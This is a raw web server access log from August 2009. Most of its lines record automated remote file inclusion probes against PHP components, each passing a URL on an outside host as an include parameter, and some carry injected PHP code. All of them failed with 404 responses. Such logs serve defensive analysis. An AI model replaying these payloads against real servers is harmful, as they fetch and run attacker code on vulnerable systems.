61.114.35.0 - - [02/Aug/2009:02:33:34 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0191E3492E35A700DE0306L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
61.114.35.0 - - [02/Aug/2009:02:33:34 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0191E3492E35A700DE0306L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.0.237.140 - - [02/Aug/2009:02:33:42 -0400] "GET /logs/access_log.Q109072300//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:35:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [02/Aug/2009:02:37:41 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:02:37:41 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:02:37:41 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:37:50 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:37:57 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:06 -0400] "GET /logs/error_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:17 -0400] "GET /logs/error_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:19 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:26 -0400] "GET /logs/access_log.Q109070200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:26 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:38:32 -0400] "GET /logs/access_log.Q109070200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:02:39:14 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.14.123.202 - - [02/Aug/2009:02:39:51 -0400] "GET /logs/access_log.Q109061200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:39:51 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:39:51 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
216.14.123.202 - - [02/Aug/2009:02:39:56 -0400] "GET /logs/access_log.Q109070700/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.813"
69.175.2.122 - - [02/Aug/2009:02:40:22 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:24 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:24 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:44 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:44 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:44 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:45 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:46 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:46 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:49 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:50 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:50 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:50 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:51 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:53 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:53 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:53 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:54 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:56 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:57 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:40:57 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:40:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.175.2.122 - - [02/Aug/2009:02:41:08 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.43.202.66 - - [02/Aug/2009:02:41:24 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:24 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:24 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
69.175.2.122 - - [02/Aug/2009:02:41:26 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:27 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:31 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.43.202.66 - - [02/Aug/2009:02:41:33 -0400] "GET /logs/access_log.Q109070800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:33 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:33 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
69.175.2.122 - - [02/Aug/2009:02:41:33 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:34 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:38 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:38 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:02:41:38 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:41:48 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
117.110.74.195 - - [02/Aug/2009:02:41:49 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET //common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET /logs//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET //common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:41:51 -0400] "GET /logs//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:42:00 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:42:09 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:42:31 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:42:31 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
124.0.237.140 - - [02/Aug/2009:02:44:08 -0400] "GET /logs//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:44:08 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:44:08 -0400] "GET //modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:44:58 -0400] "GET //modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:44:58 -0400] "GET /logs//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:44:59 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:24 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:24 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:25 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:36 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:36 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:45:36 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:45:45 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:45:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.222.19 - - [02/Aug/2009:02:46:09 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:46:09 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:46:09 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:46:20 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:46:56 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:47:01 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:47:01 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:07 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:10 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:10 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:10 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:17 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:17 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:47:17 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:47:28 -0400] "GET /logs/access_log.Q109062400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:47:28 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.95.78.112 - - [02/Aug/2009:02:47:38 -0400] "GET http://ant.dsabuse.com/abc.php?auth=45V456b09m&strPassword=WVMTTW_OJZCRO&nLoginId=43 HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
217.199.222.19 - - [02/Aug/2009:02:47:44 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:02:48:27 -0400] "GET /default.php?page=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:02:48:27 -0400] "GET /logs/access_log.Q109062200/default.php?page=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:02:48:27 -0400] "GET /logs/default.php?page=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
217.199.222.19 - - [02/Aug/2009:02:48:35 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:48:40 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:02:49:10 -0400] "GET /logs/error_log.Q109062200/default.php?page=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
